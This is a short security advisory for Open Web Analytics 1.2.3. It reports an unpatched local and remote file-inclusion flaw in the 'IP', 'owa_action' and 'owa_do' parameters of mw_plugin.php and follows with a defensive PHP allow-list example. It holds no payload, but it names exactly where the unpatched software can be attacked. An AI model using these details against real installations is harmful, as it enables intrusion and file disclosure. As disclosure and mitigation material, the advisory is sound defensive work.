Vendor: Open Web Analytics
By: ItSecTeam
CVSS: 7.5 (HIGH)
Multi File Include
CWE: 22
Product Name: Open Web Analytics
Affected Version From: 1.2.3
Affected Version To: 1.2.3
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
Open Web Analytics 1.2.3
The vulnerability exists due to insufficient sanitization of user-supplied input in the 'IP', 'owa_action' and 'owa_do' parameters of the 'mw_plugin.php' script. This can be exploited to include arbitrary files from local resources via directory traversal sequences (Local File Include, LFI) and from remote resources via URLs (Remote File Include, RFI).
Mitigation:
Input validation should be used to prevent the exploitation of this vulnerability.
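
One way to apply that input validation to a parameter that selects a file to include, shown as an added example that is not Open Web Analytics code. The function name `resolve_include`, the `ALLOWED_ACTIONS` map, the file names and the `modules` directory are hypothetical; PHP 8 or later is assumed.

```php
<?php
declare(strict_types=1);

// Hypothetical allow-list: request value => file below the base directory.
// The names are constructed for this example.
const ALLOWED_ACTIONS = [
    'report'   => 'actions/report.php',
    'settings' => 'actions/settings.php',
];

/**
 * Resolve a user-supplied action name to a file that is safe to include.
 * Returns null when the value is not a string, is not in the allow-list,
 * or resolves to a path outside $baseDir.
 * $baseDir is fixed by the application and never taken from request input.
 */
function resolve_include(mixed $value, string $baseDir): ?string
{
    // Arrays (e.g. ?owa_do[]=x) and other non-strings are rejected outright.
    if (!is_string($value) || !array_key_exists($value, ALLOWED_ACTIONS)) {
        return null;
    }
    // realpath() resolves ".." and symlinks and returns false for missing files.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . ALLOWED_ACTIONS[$value]);
    if ($base === false || $path === false) {
        return null;
    }
    // Containment check: the resolved file must live under the base directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// The request value only selects a key; it is never concatenated into a path,
// so traversal sequences and URLs cannot reach the include statement.
$file = resolve_include($_GET['owa_do'] ?? null, __DIR__ . '/modules');
if ($file === null) {
    http_response_code(400);
    exit('Unknown action');
}
require $file;
```

Setting `allow_url_include = Off` in `php.ini` (the PHP default) additionally stops `include` and `require` from fetching remote URLs.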